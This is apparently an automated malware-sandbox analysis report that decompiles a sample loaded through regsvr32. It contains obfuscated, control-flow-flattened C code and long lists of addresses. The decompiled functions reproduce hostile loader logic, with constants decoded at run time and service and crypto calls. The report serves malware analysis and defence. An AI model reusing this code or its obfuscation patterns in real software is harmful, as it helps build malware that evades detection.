				_v40 = 0xf48a85;
				_v40 = _v40 + 0xffff29a0;
				_v40 = _v40 ^ 0x00fe1535;
				_v64 = 0x2bce2f;
				_v64 = _v64 + 0xf1c5;
				_v64 = _v64 ^ 0x0028e256;
				_v140 = 0x77e17b;
				_v140 = _v140 | 0xc6b8826a;
				_v140 = _v140 << 0xb;
				_v140 = _v140 * 0x6f;
				_v140 = _v140 ^ 0x9d1458a5;
				_v52 = 0xfd118a;
				_v52 = _v52 ^ 0xa24042de;
				_v52 = _v52 ^ 0xa2b29965;
				_v156 = 0xb94921;
				_t423 = 0x71;
				_v156 = _v156 / _t423;
				_v156 = _v156 ^ 0x37d84cf7;
				_v156 = _v156 ^ 0x738f2c3a;
				_v156 = _v156 ^ 0x445e42c2;
				_v60 = 0x61301a;
				_v60 = _v60 ^ 0xe979425d;
				_v60 = _v60 ^ 0xe9194fd3;
				_v68 = 0x969166;
				_t424 = 0x5b;
				_v68 = _v68 * 0x77;
				_v68 = _v68 ^ 0x45f3d99e;
				_v76 = 0x674bab;
				_v76 = _v76 | 0x0a596e1e;
				_v76 = _v76 ^ 0x0a785c63;
				_v80 = 0xc0b1ed;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000eda9f;
				_v168 = 0x136e5b;
				_t425 = 0x4c;
				_v168 = _v168 / _t424;
				_v168 = _v168 | 0x9a56592d;
				_v168 = _v168 + 0xffffc214;
				_v168 = _v168 ^ 0x9a58d8d8;
				_v24 = 0xe609c7;
				_v24 = _v24 / _t425;
				_v24 = _v24 ^ 0x000a865c;
				_v112 = 0x6bafdb;
				_v112 = _v112 | 0xd90cd38d;
				_v112 = _v112 + 0xffffb4ac;
				_v112 = _v112 ^ 0xd96a74d9;
				_v48 = 0x718c22;
				_v48 = _v48 ^ 0x5e6f6b2c;
				_v48 = _v48 ^ 0x5e1b3469;
				_v28 = 0x6a5e9f;
				_t426 = 0x39;
				_v28 = _v28 / _t426;
				_v28 = _v28 ^ 0x0002d467;
				_v148 = 0x1220f7;
				_t427 = 0x65;
				_v148 = _v148 / _t427;
				_v148 = _v148 >> 6;
				_v148 = _v148 | 0x1e093e29;
				_v148 = _v148 ^ 0x1e088385;
				_v116 = 0x15d9ef;
				_v116 = _v116 + 0x4191;
				_v116 = _v116 ^ 0x635ba0ed;
				_v116 = _v116 ^ 0x634c2e10;
				_v164 = 0x3e804d;
				_v164 = _v164 | 0xd3c05b93;
				_t428 = 0x63;
				_v164 = _v164 * 0x70;
				_v164 = _v164 + 0xffffea8e;
				_v164 = _v164 ^ 0xbf879c24;
				_v72 = 0x4ff13e;
				_v72 = _v72 / _t428;
				_v72 = _v72 ^ 0x0007b33f;
				_v128 = 0xbff743;
				_v128 = _v128 << 8;
				_v128 = _v128 + 0xffff3563;
				_v128 = _v128 ^ 0xbff480eb;
				_v108 = 0x72d981;
				_v108 = _v108 + 0xffffa173;
				_v108 = _v108 * 0x2b;
				_v108 = _v108 ^ 0x133dd588;
				_v100 = 0xeb694a;
				_v100 = _v100 + 0x6185;
				_v100 = _v100 | 0x4c1b24b5;
				_v100 = _v100 ^ 0x4cf9785d;
				_v56 = 0x35076d;
				_v56 = _v56 + 0xffff253a;
				_v56 = _v56 ^ 0x003648f7;
				_v32 = 0xc8662f;
				_v32 = _v32 << 0xa;
				_v32 = _v32 ^ 0x219b0029;
				_v120 = 0x3cbb81;
				_v120 = _v120 ^ 0x12374250;
				_v120 = _v120 << 0x10;
				_v120 = _v120 ^ 0xf9d9ef11;
				_v20 = 0x4ecff7;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x000e9560;
				_v152 = 0xf2f051;
				_v152 = _v152 ^ 0x811bcc4b;
				_v152 = _v152 ^ 0x85fc57a3;
				_v152 = _v152 * 0x16;
				_v152 = _v152 ^ 0x59d22df9;
				_v132 = 0xe2920e;
				_v132 = _v132 + 0x7adb;
				_v132 = _v132 | 0x160b0ff9;
				_v132 = _v132 ^ 0x16e6d6c2;
				_t429 = _v12;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t442 = _t432 - 0x8fee750;
							if(_t442 > 0) {
								break;
							}
							if(_t442 == 0) {
								_t360 = E001A8E38(_v104, _v24, _v112, _v48,  *_t429, _t382); // executed
								_t382 = _v144;
								_t439 =  &(_t439[4]);
								_v16 = _t360;
								_t355 = _v136;
								_t413 = 0x772a3ce;
								_t432 =  !=  ? 0x772a3ce : 0xd273812;
								continue;
							} else {
								if(_t432 == 0xf7de38) {
									E001B17D2(_v120, _v20, _t437);
									_t432 = 0xa1d1e2a;
									goto L11;
								} else {
									if(_t432 == 0x3dc7f9a) {
										E001B640E(_v56, _v32, _t437, _a4, _v84);
										_t439 =  &(_t439[3]);
										L15:
										_t432 = 0xf7de38;
										goto L11;
									} else {
										if(_t432 == _t413) {
											E001ACD1C(_v28, _v148, _v116, _v164,  &_v8, _t382, _v92, _v72, _t437, _v16);
											_t432 =  !=  ? 0x3dc7f9a : 0xd273812;
											E001BED7B(_v16, _v128, _v108, _v100);
											_t439 =  &(_t439[0xa]);
											L28:
											_t382 = _v144;
											_t413 = 0x772a3ce;
											goto L29;
										} else {
											if(_t432 == 0x7b0f732) {
												_push(_t382);
												_t437 = E001A303A(_t382, 0x2000);
												_t439 =  &(_t439[3]);
												_t432 =  !=  ? 0xfd07dd1 : 0xa1d1e2a;
												L11:
												_t355 = _v136;
												L12:
												_t382 = _v144;
												goto L1;
											} else {
												if(_t432 != 0x8c861f1) {
													goto L29;
												} else {
													_t432 = 0xcaa30f9;
													continue;
												}
											}
										}
									}
								}
							}
							goto L30;
						}
						if(_t432 == 0xa1d1e2a) {
							E001B17D2(_v152, _v132, _t381);
							_t432 = 0xf52315e;
							goto L28;
						} else {
							if(_t432 == 0xcaa30f9) {
								_push(_t382);
								_t355 = E001A303A(_t382, 0x20000); // executed
								_t381 = _t355;
								_t439 =  &(_t439[3]);
								if(_t381 != 0) {
									_t432 = 0x7b0f732;
									goto L11;
								}
							} else {
								if(_t432 == 0xd273812) {
									_t429 = _t429 + 0x2c;
									asm("sbb esi, esi");
									_t432 = (_t432 & 0x08070918) + 0xf7de38;
									goto L2;
								} else {
									if(_t432 != 0xfd07dd1) {
										goto L29;
									} else {
										_push( &_v4);
										_push(_v80);
										_push(_t382);
										_push(_t382);
										_push(_v76);
										_push(_v68);
										_push(_t382);
										_push(_v60);
										_push(_t381);
										_push(_t382);
										_push( &_v12);
										_push(_v156);
										_t364 = E001A32B3(_v140, _v52);
										_t439 = _t439 - 0xc + 0x3c;
										if(_t364 == 0) {
											goto L15;
										} else {
											_t366 = E001ACCA2();
											_t432 = 0x8fee750;
											_t355 = _v12 * 0x2c + _t381;
											_v136 = _v12 * 0x2c + _t381;
											_t429 =  >=  ? _t381 : (_t366 & 0x0000001f) * 0x2c + _t381;
											goto L12;
										}
										L31:
									}
								}
							}
						}
						break;
						L29:
						_t355 = _v136;
					} while (_t432 != 0xf52315e);
					L30:
					return _t355;
					goto L31;
				}
			}


































































                                                                                                                0x001a364e
                                                                                                                0x001a3658
                                                                                                                0x001a365f
                                                                                                                0x001a3663
                                                                                                                0x001a366a
                                                                                                                0x001a3671
                                                                                                                0x001a3672
                                                                                                                0x001a3673
                                                                                                                0x001a3678
                                                                                                                0x001a3680
                                                                                                                0x001a3689
                                                                                                                0x001a368b
                                                                                                                0x001a3690
                                                                                                                0x001a3694
                                                                                                                0x001a3699
                                                                                                                0x001a369f
                                                                                                                0x001a36a7
                                                                                                                0x001a36af
                                                                                                                0x001a36b7
                                                                                                                0x001a36bc
                                                                                                                0x001a36c4
                                                                                                                0x001a36d1
                                                                                                                0x001a36d4
                                                                                                                0x001a36d8
                                                                                                                0x001a36dd
                                                                                                                0x001a36e5
                                                                                                                0x001a36f5
                                                                                                                0x001a36f9
                                                                                                                0x001a36fe
                                                                                                                0x001a3706
                                                                                                                0x001a370e
                                                                                                                0x001a3716
                                                                                                                0x001a371e
                                                                                                                0x001a3726
                                                                                                                0x001a372e
                                                                                                                0x001a3739
                                                                                                                0x001a3741
                                                                                                                0x001a374c
                                                                                                                0x001a3757
                                                                                                                0x001a3762
                                                                                                                0x001a376d
                                                                                                                0x001a3775
                                                                                                                0x001a377d
                                                                                                                0x001a3785
                                                                                                                0x001a378d
                                                                                                                0x001a379a
                                                                                                                0x001a379b
                                                                                                                0x001a37a5
                                                                                                                0x001a37a9
                                                                                                                0x001a37b1
                                                                                                                0x001a37bc
                                                                                                                0x001a37c7
                                                                                                                0x001a37d2
                                                                                                                0x001a37da
                                                                                                                0x001a37e2
                                                                                                                0x001a37ea
                                                                                                                0x001a37f2
                                                                                                                0x001a37fa
                                                                                                                0x001a3804
                                                                                                                0x001a3808
                                                                                                                0x001a3810
                                                                                                                0x001a381b
                                                                                                                0x001a3826
                                                                                                                0x001a3831
                                                                                                                0x001a3841
                                                                                                                0x001a3846
                                                                                                                0x001a384c
                                                                                                                0x001a3854
                                                                                                                0x001a385c
                                                                                                                0x001a3864
                                                                                                                0x001a386f
                                                                                                                0x001a387a
                                                                                                                0x001a3885
                                                                                                                0x001a3892
                                                                                                                0x001a3895
                                                                                                                0x001a3899
                                                                                                                0x001a38a1
                                                                                                                0x001a38a9
                                                                                                                0x001a38b1
                                                                                                                0x001a38b9
                                                                                                                0x001a38c1
                                                                                                                0x001a38c6
                                                                                                                0x001a38ce
                                                                                                                0x001a38dc
                                                                                                                0x001a38dd
                                                                                                                0x001a38e3
                                                                                                                0x001a38eb
                                                                                                                0x001a38f3
                                                                                                                0x001a38fb
                                                                                                                0x001a3911
                                                                                                                0x001a391a
                                                                                                                0x001a3925
                                                                                                                0x001a392d
                                                                                                                0x001a3935
                                                                                                                0x001a393d
                                                                                                                0x001a3945
                                                                                                                0x001a3950
                                                                                                                0x001a395b
                                                                                                                0x001a3966
                                                                                                                0x001a3978
                                                                                                                0x001a397d
                                                                                                                0x001a3986
                                                                                                                0x001a3991
                                                                                                                0x001a399d
                                                                                                                0x001a39a2
                                                                                                                0x001a39a6
                                                                                                                0x001a39ab
                                                                                                                0x001a39b3
                                                                                                                0x001a39bb
                                                                                                                0x001a39c3
                                                                                                                0x001a39cb
                                                                                                                0x001a39d3
                                                                                                                0x001a39db
                                                                                                                0x001a39e3
                                                                                                                0x001a39f0
                                                                                                                0x001a39f1
                                                                                                                0x001a39f5
                                                                                                                0x001a39fd
                                                                                                                0x001a3a07
                                                                                                                0x001a3a15
                                                                                                                0x001a3a19
                                                                                                                0x001a3a21
                                                                                                                0x001a3a29
                                                                                                                0x001a3a2e
                                                                                                                0x001a3a36
                                                                                                                0x001a3a3e
                                                                                                                0x001a3a46
                                                                                                                0x001a3a53
                                                                                                                0x001a3a57
                                                                                                                0x001a3a5f
                                                                                                                0x001a3a67
                                                                                                                0x001a3a6f
                                                                                                                0x001a3a77
                                                                                                                0x001a3a7f
                                                                                                                0x001a3a8a
                                                                                                                0x001a3a95
                                                                                                                0x001a3aa0
                                                                                                                0x001a3aab
                                                                                                                0x001a3ab3
                                                                                                                0x001a3abe
                                                                                                                0x001a3ac6
                                                                                                                0x001a3ace
                                                                                                                0x001a3ad3
                                                                                                                0x001a3adb
                                                                                                                0x001a3ae6
                                                                                                                0x001a3aee
                                                                                                                0x001a3af9
                                                                                                                0x001a3b01
                                                                                                                0x001a3b09
                                                                                                                0x001a3b16
                                                                                                                0x001a3b1a
                                                                                                                0x001a3b26
                                                                                                                0x001a3b2e
                                                                                                                0x001a3b36
                                                                                                                0x001a3b3e
                                                                                                                0x001a3b46
                                                                                                                0x001a3b4d
                                                                                                                0x001a3b4d
                                                                                                                0x001a3b4d
                                                                                                                0x001a3b52
                                                                                                                0x001a3b52
                                                                                                                0x001a3b52
                                                                                                                0x001a3b52
                                                                                                                0x001a3b58
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a3b5e
                                                                                                                0x001a3c9c
                                                                                                                0x001a3ca1
                                                                                                                0x001a3ca5
                                                                                                                0x001a3caa
                                                                                                                0x001a3cb1
                                                                                                                0x001a3cba
                                                                                                                0x001a3cbf
                                                                                                                0x00000000
                                                                                                                0x001a3b64
                                                                                                                0x001a3b6a
                                                                                                                0x001a3c73
                                                                                                                0x001a3c79
                                                                                                                0x00000000
                                                                                                                0x001a3b70
                                                                                                                0x001a3b76
                                                                                                                0x001a3c55
                                                                                                                0x001a3c5a
                                                                                                                0x001a3c5d
                                                                                                                0x001a3c5d
                                                                                                                0x00000000
                                                                                                                0x001a3b7c
                                                                                                                0x001a3b7e
                                                                                                                0x001a3c07
                                                                                                                0x001a3c2b
                                                                                                                0x001a3c2e
                                                                                                                0x001a3c33
                                                                                                                0x001a3dd7
                                                                                                                0x001a3dd7
                                                                                                                0x001a3ddb
                                                                                                                0x00000000
                                                                                                                0x001a3b80
                                                                                                                0x001a3b86
                                                                                                                0x001a3bae
                                                                                                                0x001a3bba
                                                                                                                0x001a3bbc
                                                                                                                0x001a3bcb
                                                                                                                0x001a3bce
                                                                                                                0x001a3bce
                                                                                                                0x001a3bd2
                                                                                                                0x001a3bd2
                                                                                                                0x00000000
                                                                                                                0x001a3b88
                                                                                                                0x001a3b8e
                                                                                                                0x00000000
                                                                                                                0x001a3b94
                                                                                                                0x001a3b94
                                                                                                                0x00000000
                                                                                                                0x001a3b94
                                                                                                                0x001a3b8e
                                                                                                                0x001a3b86
                                                                                                                0x001a3b7e
                                                                                                                0x001a3b76
                                                                                                                0x001a3b6a
                                                                                                                0x00000000
                                                                                                                0x001a3b5e
                                                                                                                0x001a3ccd
                                                                                                                0x001a3dcc
                                                                                                                0x001a3dd2
                                                                                                                0x00000000
                                                                                                                0x001a3cd3
                                                                                                                0x001a3cd9
                                                                                                                0x001a3da4
                                                                                                                0x001a3dab
                                                                                                                0x001a3db0
                                                                                                                0x001a3db2
                                                                                                                0x001a3db7
                                                                                                                0x001a3db9
                                                                                                                0x00000000
                                                                                                                0x001a3db9
                                                                                                                0x001a3cdf
                                                                                                                0x001a3ce5
                                                                                                                0x001a3d76
                                                                                                                0x001a3d7b
                                                                                                                0x001a3d83
                                                                                                                0x00000000
                                                                                                                0x001a3ceb
                                                                                                                0x001a3cf2
                                                                                                                0x00000000
                                                                                                                0x001a3cf8
                                                                                                                0x001a3cff
                                                                                                                0x001a3d0a
                                                                                                                0x001a3d0e
                                                                                                                0x001a3d0f
                                                                                                                0x001a3d10
                                                                                                                0x001a3d17
                                                                                                                0x001a3d1e
                                                                                                                0x001a3d1f
                                                                                                                0x001a3d26
                                                                                                                0x001a3d27
                                                                                                                0x001a3d28
                                                                                                                0x001a3d29
                                                                                                                0x001a3d38
                                                                                                                0x001a3d3d
                                                                                                                0x001a3d42
                                                                                                                0x00000000
                                                                                                                0x001a3d48
                                                                                                                0x001a3d4c
                                                                                                                0x001a3d54
                                                                                                                0x001a3d66
                                                                                                                0x001a3d6a
                                                                                                                0x001a3d6e
                                                                                                                0x00000000
                                                                                                                0x001a3d6e
                                                                                                                0x00000000
                                                                                                                0x001a3d42
                                                                                                                0x001a3cf2
                                                                                                                0x001a3ce5
                                                                                                                0x001a3cd9
                                                                                                                0x00000000
                                                                                                                0x001a3de0
                                                                                                                0x001a3de0
                                                                                                                0x001a3de4
                                                                                                                0x001a3dfa
                                                                                                                0x001a3dfa
                                                                                                                0x00000000
                                                                                                                0x001a3dfa

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: )$,ko^$7n3$7n3$Ji$V($]By$c\x${w
                                                                                                                • API String ID: 3098006287-1107212377
                                                                                                                • Opcode ID: 37df18c64e33afa48591d15ddaa7b434d1e1566a31ab6131a220b9f10129294d
                                                                                                                • Instruction ID: 1fd9ee0042776a639fe24313031428b6b8df1e57198fd69366067c839be59e12
                                                                                                                • Opcode Fuzzy Hash: 37df18c64e33afa48591d15ddaa7b434d1e1566a31ab6131a220b9f10129294d
                                                                                                                • Instruction Fuzzy Hash: B20221769083809FD364CF26C586A4BBBE2FBC5304F108A2DF5A996261D7B58949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C13A3 Relevance: 10.3, Strings: 8, Instructions: 287COMMONCrypto
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 386 1c13a3-1c17e2 387 1c17ea-1c17f0 386->387 388 1c17f6-1c17f8 387->388 389 1c19c2-1c19d3 call 1a2221 387->389 390 1c17fe-1c1804 388->390 391 1c199a-1c19bd call 1c2545 388->391 397 1c19da-1c19e0 389->397 393 1c19e8-1c19fc call 1b02d8 390->393 394 1c180a-1c1810 390->394 391->387 407 1c19fd-1c1a09 393->407 399 1c190f-1c1980 call 1beab3 394->399 400 1c1816-1c181c 394->400 397->387 402 1c19e6 397->402 409 1c1985-1c1995 399->409 405 1c1822-1c1828 400->405 406 1c18b3-1c18f2 call 1ba50a 400->406 402->407 410 1c183a-1c18ae call 1bf5d9 call 1b8eb3 call 1bf94b 405->410 411 1c182a-1c1830 405->411 412 1c18f7-1c18ff 406->412 409->387 410->387 411->397 413 1c1836-1c1838 411->413 412->407 415 1c1905-1c190a 412->415 413->387 415->387
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001C13A3() {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				char _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				intOrPtr _t309;
				void* _t312;
				signed int _t314;
				void* _t315;
				intOrPtr _t317;
				void* _t320;
				void* _t321;
				char _t328;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t356;

				_v528 = _v528 & 0x00000000;
				_v532 = 0x1878ef;
				_t321 = 0xe6b0b61;
				_v588 = 0x2f6858;
				_t5 =  &_v588; // 0x2f6858
				_t350 = 0x73;
				_v588 =  *_t5 / _t350;
				_v588 = _v588 ^ 0x00006989;
				_t320 = 0;
				_v604 = 0x143052;
				_v604 = _v604 + 0x84a1;
				_v604 = _v604 ^ 0x0014b5f3;
				_v656 = 0xfbe874;
				_v656 = _v656 + 0x61d6;
				_v656 = _v656 + 0xffffea3d;
				_v656 = _v656 ^ 0x00fc3484;
				_v696 = 0xff5b70;
				_v696 = _v696 | 0x535d98c7;
				_v696 = _v696 + 0xfffff950;
				_v696 = _v696 + 0xffffd1ca;
				_v696 = _v696 ^ 0x53ffa711;
				_v652 = 0x524336;
				_v652 = _v652 << 1;
				_v652 = _v652 | 0x0b93763e;
				_v652 = _v652 ^ 0x0bbf92e8;
				_v660 = 0x88d82a;
				_v660 = _v660 << 0xa;
				_v660 = _v660 + 0xffff6819;
				_v660 = _v660 ^ 0x2367960d;
				_v608 = 0xd91fa2;
				_v608 = _v608 >> 3;
				_v608 = _v608 ^ 0x0013678b;
				_v600 = 0x89853e;
				_t351 = 5;
				_v600 = _v600 * 0x4a;
				_v600 = _v600 ^ 0x27c2a7a2;
				_v644 = 0x61cd84;
				_v644 = _v644 + 0xffff330a;
				_v644 = _v644 + 0x279e;
				_v644 = _v644 ^ 0x0061f33c;
				_v708 = 0x92cce;
				_v708 = _v708 + 0xbb92;
				_v708 = _v708 >> 2;
				_v708 = _v708 + 0xffff1a93;
				_v708 = _v708 ^ 0x000d2f6b;
				_v620 = 0xbd1e0e;
				_v620 = _v620 / _t351;
				_v620 = _v620 ^ 0x002eeadc;
				_v584 = 0x760b38;
				_v584 = _v584 << 0xa;
				_v584 = _v584 ^ 0xd827259a;
				_v628 = 0xa9e30f;
				_v628 = _v628 | 0x1d27cf5f;
				_v628 = _v628 ^ 0x1dae209f;
				_v700 = 0x932dee;
				_v700 = _v700 >> 8;
				_t352 = 0x78;
				_v700 = _v700 / _t352;
				_v700 = _v700 ^ 0xdcaf0248;
				_v700 = _v700 ^ 0xdca84581;
				_v692 = 0x4e7658;
				_v692 = _v692 * 0x38;
				_v692 = _v692 >> 6;
				_v692 = _v692 + 0xffffc067;
				_v692 = _v692 ^ 0x004989d0;
				_v712 = 0x19f0a3;
				_v712 = _v712 >> 6;
				_v712 = _v712 + 0xffffbcc9;
				_v712 = _v712 << 5;
				_v712 = _v712 ^ 0x000b5c15;
				_v676 = 0x4b761a;
				_v676 = _v676 + 0xab76;
				_v676 = _v676 | 0xad8bdcbc;
				_v676 = _v676 ^ 0xadc1f077;
				_v672 = 0xbd59d7;
				_v672 = _v672 ^ 0xb1e0d3f9;
				_v672 = _v672 << 1;
				_v672 = _v672 ^ 0x62b2b1eb;
				_v612 = 0x3dbded;
				_t353 = 0x23;
				_v612 = _v612 / _t353;
				_v612 = _v612 ^ 0x00018277;
				_v680 = 0x41be48;
				_v680 = _v680 * 7;
				_v680 = _v680 + 0xffffba00;
				_v680 = _v680 ^ 0x01c55266;
				_v648 = 0x6aa77c;
				_v648 = _v648 | 0x3f97aaee;
				_v648 = _v648 << 0x10;
				_v648 = _v648 ^ 0xaff75eba;
				_v596 = 0xf8fdbe;
				_v596 = _v596 + 0x5176;
				_v596 = _v596 ^ 0x00f4c20d;
				_v664 = 0x6f8710;
				_v664 = _v664 + 0xffff8f2a;
				_v664 = _v664 >> 0x10;
				_v664 = _v664 ^ 0x000f2be4;
				_v592 = 0x3c4ec8;
				_v592 = _v592 | 0xac0a4eef;
				_v592 = _v592 ^ 0xac3533e1;
				_v704 = 0x3b1eeb;
				_v704 = _v704 + 0xffffd56f;
				_v704 = _v704 + 0xffff6cd9;
				_v704 = _v704 ^ 0x8b69afc8;
				_v704 = _v704 ^ 0x8b53d426;
				_v640 = 0xdef71;
				_v640 = _v640 << 3;
				_v640 = _v640 + 0xffffec65;
				_v640 = _v640 ^ 0x0064433f;
				_v616 = 0xea0634;
				_v616 = _v616 + 0xeb63;
				_v616 = _v616 ^ 0x00e7901e;
				_v624 = 0xa05a60;
				_v624 = _v624 >> 7;
				_v624 = _v624 ^ 0x00093cc4;
				_v668 = 0xa176a5;
				_v668 = _v668 >> 0xa;
				_v668 = _v668 + 0xffff80dd;
				_v668 = _v668 ^ 0xfff797cb;
				_v688 = 0x693beb;
				_v688 = _v688 * 0x11;
				_v688 = _v688 << 9;
				_v688 = _v688 | 0x0c7e3274;
				_v688 = _v688 ^ 0xfdf7f2d9;
				_v636 = 0x3eae9e;
				_v636 = _v636 + 0xf099;
				_v636 = _v636 ^ 0xa06ebc01;
				_v636 = _v636 ^ 0xa05eab20;
				_v632 = 0x44b33d;
				_v632 = _v632 << 0xe;
				_v632 = _v632 ^ 0x2cc9f997;
				_t349 = _v632;
				_v684 = 0x163cc3;
				_v684 = _v684 << 9;
				_v684 = _v684 << 4;
				_v684 = _v684 ^ 0xc793c21e;
				do {
					while(_t321 != 0xdbb0bb) {
						if(_t321 == 0x19376b1) {
							E001C2545(_v652, _v660, _v608,  &_v580);
							_t321 = 0xdbb0bb;
							continue;
						} else {
							if(_t321 == 0x58c3956) {
								E001B02D8(_t349, _v636, _v632, _v684);
							} else {
								if(_t321 == 0x666440e) {
									_t309 = _v576;
									_t328 = _v580;
									_v568 = _t309;
									_v560 = _t309;
									_v552 = _t309;
									_v544 = _t309;
									_v540 = _v696;
									_v572 = _t328;
									_v564 = _t328;
									_v556 = _t328;
									_v548 = _t328;
									_t312 = E001BEAB3(_t328, _v616, _v624, _t328,  &_v572, _t349, _v668, _v688); // executed
									_t356 = _t356 + 0x18;
									__eflags = _t312;
									_t320 =  !=  ? 1 : _t320;
									_t321 = 0x58c3956;
									continue;
								} else {
									if(_t321 == 0xdde7308) {
										_t314 = E001BA50A(_v680, _v656, _v648, _v596, 0, _v664, _v592, _v604, _t321, _v704, _v588, _v640,  &_v524); // executed
										_t349 = _t314;
										_t356 = _t356 + 0x30;
										__eflags = _t314 - 0xffffffff;
										if(__eflags != 0) {
											_t321 = 0x666440e;
											continue;
										}
									} else {
										if(_t321 == 0xdedc1db) {
											_push(_v620);
											_push(0x1a109c);
											_push(_v708);
											_t315 = E001BF5D9(_v600, _v644, __eflags);
											_t317 =  *0x1c4c10; // 0x67d820
											_t249 = _t317 + 4; // 0x67d824
											E001B8EB3(_t249, __eflags, _v584, _v600, _v628,  &_v524, _v700, _t315, _v692);
											E001BF94B(_t315, _v712, _v676, _v672, _v612);
											_t356 = _t356 + 0x34;
											_t321 = 0xdde7308;
											continue;
										} else {
											if(_t321 != 0xe6b0b61) {
												goto L15;
											} else {
												_t321 = 0x19376b1;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t320;
					}
					_v580 = _v580 - E001A2221(_t321);
					_t321 = 0xdedc1db;
					asm("sbb [esp+0x9c], edx");
					L15:
					__eflags = _t321 - 0xdd806ec;
				} while (__eflags != 0);
				goto L18;
			}































































                                                                                                                0x001c13a9
                                                                                                                0x001c13b3
                                                                                                                0x001c13be
                                                                                                                0x001c13c3
                                                                                                                0x001c13ce
                                                                                                                0x001c13db
                                                                                                                0x001c13e0
                                                                                                                0x001c13e9
                                                                                                                0x001c13f4
                                                                                                                0x001c13f6
                                                                                                                0x001c1401
                                                                                                                0x001c140c
                                                                                                                0x001c1417
                                                                                                                0x001c141f
                                                                                                                0x001c1427
                                                                                                                0x001c142f
                                                                                                                0x001c1437
                                                                                                                0x001c143f
                                                                                                                0x001c1447
                                                                                                                0x001c144f
                                                                                                                0x001c1457
                                                                                                                0x001c145f
                                                                                                                0x001c1467
                                                                                                                0x001c146b
                                                                                                                0x001c1473
                                                                                                                0x001c147b
                                                                                                                0x001c1483
                                                                                                                0x001c1488
                                                                                                                0x001c1490
                                                                                                                0x001c1498
                                                                                                                0x001c14a3
                                                                                                                0x001c14ab
                                                                                                                0x001c14b6
                                                                                                                0x001c14c9
                                                                                                                0x001c14cc
                                                                                                                0x001c14d3
                                                                                                                0x001c14de
                                                                                                                0x001c14e6
                                                                                                                0x001c14ee
                                                                                                                0x001c14f6
                                                                                                                0x001c14fe
                                                                                                                0x001c1506
                                                                                                                0x001c150e
                                                                                                                0x001c1513
                                                                                                                0x001c151b
                                                                                                                0x001c1523
                                                                                                                0x001c1533
                                                                                                                0x001c1537
                                                                                                                0x001c153f
                                                                                                                0x001c154a
                                                                                                                0x001c1552
                                                                                                                0x001c155d
                                                                                                                0x001c1565
                                                                                                                0x001c156d
                                                                                                                0x001c1575
                                                                                                                0x001c157d
                                                                                                                0x001c1586
                                                                                                                0x001c1589
                                                                                                                0x001c158d
                                                                                                                0x001c1595
                                                                                                                0x001c159d
                                                                                                                0x001c15aa
                                                                                                                0x001c15ae
                                                                                                                0x001c15b3
                                                                                                                0x001c15bb
                                                                                                                0x001c15c5
                                                                                                                0x001c15d2
                                                                                                                0x001c15d7
                                                                                                                0x001c15df
                                                                                                                0x001c15e4
                                                                                                                0x001c15ec
                                                                                                                0x001c15f4
                                                                                                                0x001c15fc
                                                                                                                0x001c1604
                                                                                                                0x001c160c
                                                                                                                0x001c1614
                                                                                                                0x001c161c
                                                                                                                0x001c1620
                                                                                                                0x001c1628
                                                                                                                0x001c1636
                                                                                                                0x001c1639
                                                                                                                0x001c163d
                                                                                                                0x001c1645
                                                                                                                0x001c1652
                                                                                                                0x001c1656
                                                                                                                0x001c165e
                                                                                                                0x001c1666
                                                                                                                0x001c166e
                                                                                                                0x001c1676
                                                                                                                0x001c167b
                                                                                                                0x001c1683
                                                                                                                0x001c168e
                                                                                                                0x001c1699
                                                                                                                0x001c16a4
                                                                                                                0x001c16ac
                                                                                                                0x001c16b4
                                                                                                                0x001c16b9
                                                                                                                0x001c16c1
                                                                                                                0x001c16cc
                                                                                                                0x001c16d7
                                                                                                                0x001c16e2
                                                                                                                0x001c16ea
                                                                                                                0x001c16f2
                                                                                                                0x001c16fa
                                                                                                                0x001c1702
                                                                                                                0x001c170a
                                                                                                                0x001c1712
                                                                                                                0x001c1717
                                                                                                                0x001c171f
                                                                                                                0x001c1727
                                                                                                                0x001c172f
                                                                                                                0x001c1737
                                                                                                                0x001c173f
                                                                                                                0x001c1747
                                                                                                                0x001c174c
                                                                                                                0x001c1754
                                                                                                                0x001c175c
                                                                                                                0x001c1761
                                                                                                                0x001c1769
                                                                                                                0x001c1771
                                                                                                                0x001c177e
                                                                                                                0x001c1782
                                                                                                                0x001c1787
                                                                                                                0x001c178f
                                                                                                                0x001c1797
                                                                                                                0x001c179f
                                                                                                                0x001c17a7
                                                                                                                0x001c17af
                                                                                                                0x001c17b7
                                                                                                                0x001c17bf
